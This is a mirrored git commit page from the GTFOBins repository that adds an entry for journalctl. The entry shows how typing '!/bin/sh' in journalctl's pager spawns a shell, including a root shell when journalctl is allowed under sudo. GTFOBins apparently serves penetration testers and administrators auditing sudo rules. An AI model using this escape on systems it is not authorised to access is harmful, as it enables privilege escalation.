mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add journalctl
This commit is contained in:
parent
9514d41a80
commit
7d3a6ddd9d
12
_gtfobins/journalctl.md
Normal file
12
_gtfobins/journalctl.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
description: This might not work if run by unprivileged users depending on the system configuration.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
journalctl
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo journalctl
|
||||
!/bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user